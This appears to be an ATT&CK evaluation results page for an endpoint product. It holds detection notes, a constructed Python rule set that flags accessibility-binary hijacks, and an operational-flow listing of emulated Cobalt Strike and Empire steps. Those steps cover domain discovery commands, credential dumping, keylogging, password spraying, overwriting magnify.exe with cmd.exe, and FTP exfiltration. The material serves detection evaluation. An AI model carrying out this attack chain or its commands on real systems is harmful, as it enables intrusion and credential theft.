File details of magnify.exe in Accessibility Features Specific Behavior alert identifying it as cmd.exe by hash and common name
Email excerpt from the OverWatch team indicating they observed a Windows logon bypass (General Behavior)
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed a logon type 10 (remote interactive logon) for Kmitnick on Creeper, indicating an RDP session was established and logged into.
Telemetry showing logon type 10 (remote interactive logon) for Kmitnick on Creeper
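The 20.A.1 detection rests on two observations: the file launched as magnify.exe hashed to cmd.exe, and a type-10 logon to the same host placed the launch inside an RDP session. The following is an added example written for this page (not Falcon or MITRE code) that turns those observations into rules over process-start and logon events. Everything in it is constructed: the event fields, timestamps, the hash catalogue (the hash strings are placeholders, not real SHA-256 values of any Windows binary) and the helper set of accessibility binaries; the behaviours mirror steps 17.C.1, 20.A.1 and 20.B.1 (magnify.exe overwritten with cmd.exe, started from utilman.exe, then spawning whoami.exe).

```python
"""Accessibility-feature hijack rules over constructed process and logon telemetry.

Added example; not Falcon or MITRE code. Hashes are placeholders, not real
SHA-256 values. Mirrors steps 17.C.1, 20.A.1 and 20.B.1 on Creeper.
"""
from dataclasses import dataclass
from typing import List

# Windows accessibility helpers reachable from the logon screen (common hijack targets).
ACCESSIBILITY_BINARIES = {
    "magnify.exe", "sethc.exe", "utilman.exe", "osk.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}
SHELLS_AND_DISCOVERY = {"cmd.exe", "powershell.exe", "whoami.exe", "net.exe"}
LOGON_LAUNCHERS = {"winlogon.exe", "utilman.exe"}

# Constructed catalogue: file hash -> the binary it really is.
KNOWN_HASHES = {
    "h-cmd-constructed": "cmd.exe",
    "h-magnify-constructed": "magnify.exe",
    "h-utilman-constructed": "utilman.exe",
}


@dataclass
class ProcStart:
    host: str
    ts: int             # seconds; constructed clock
    parent_image: str
    image: str
    sha256: str


@dataclass
class Logon:
    host: str
    ts: int
    user: str
    logon_type: int     # 10 = RemoteInteractive (RDP)


def identify(e: ProcStart) -> str:
    """What the file actually is by hash; an unknown hash keeps the launched name."""
    return KNOWN_HASHES.get(e.sha256, e.image).lower()


def rdp_user(logons: List[Logon], host: str, ts: int, window: int = 600) -> str:
    """User with a type-10 logon on `host` in the `window` seconds before ts, else ''."""
    for logon in logons:
        if logon.host == host and logon.logon_type == 10 and 0 <= ts - logon.ts <= window:
            return logon.user
    return ""


def detect(events: List[ProcStart], logons: List[Logon]) -> List[dict]:
    findings = []
    for e in events:
        parent, img = e.parent_image.lower(), e.image.lower()
        actual = identify(e)
        # Rule 1: a logon-screen launcher started an accessibility binary whose
        # hash belongs to a different program (the overwritten magnify.exe case).
        if parent in LOGON_LAUNCHERS and img in ACCESSIBILITY_BINARIES and actual != img:
            findings.append({
                "rule": "accessibility feature hijack", "severity": "critical",
                "technique": "T1015", "image": e.image, "identified_as": actual,
                "rdp_user": rdp_user(logons, e.host, e.ts),
            })
        # Rule 2: an accessibility binary acting as parent of a shell or discovery
        # tool; the child inherits the parent's detection (whoami.exe under magnify.exe).
        if parent in ACCESSIBILITY_BINARIES and img in SHELLS_AND_DISCOVERY:
            findings.append({
                "rule": "child of accessibility binary", "severity": "critical",
                "image": e.image, "parent": e.parent_image, "tainted": True,
            })
    return findings


# Constructed telemetry for Creeper: a clean utilman launch, the hijacked
# magnify.exe (really cmd.exe), the whoami.exe it spawned, and a benign magnifier.
LOGONS = [Logon("Creeper", 1000, "Kmitnick", 10)]
EVENTS = [
    ProcStart("Creeper", 1005, "winlogon.exe", "utilman.exe", "h-utilman-constructed"),
    ProcStart("Creeper", 1010, "utilman.exe", "magnify.exe", "h-cmd-constructed"),
    ProcStart("Creeper", 1020, "magnify.exe", "whoami.exe", "h-unknown"),
    ProcStart("Creeper", 2000, "winlogon.exe", "magnify.exe", "h-magnify-constructed"),
]
```

`detect(EVENTS, LOGONS)` yields exactly two findings: the hijack (identified as cmd.exe, attributed to Kmitnick's RDP logon) and the tainted whoami.exe child; the genuine magnifier launch at the end is not flagged because its hash resolves to magnify.exe. In a real deployment the hash catalogue would come from a known-good inventory of System32, and an accessibility binary with an unknown hash should be treated as suspicious rather than trusted, which this example deliberately does not do so that the two rules stay separate.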
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
Telemetry showed execution of whoami.exe. The process tree view showed whoami.exe was tainted by a previous magnify.exe detection.
Telemetry from the process tree showing whoami.exe as a child of magnify.exe (tainted; the pink line indicates critical severity)
Operational Flow

The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discovery

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discovery

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner / User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)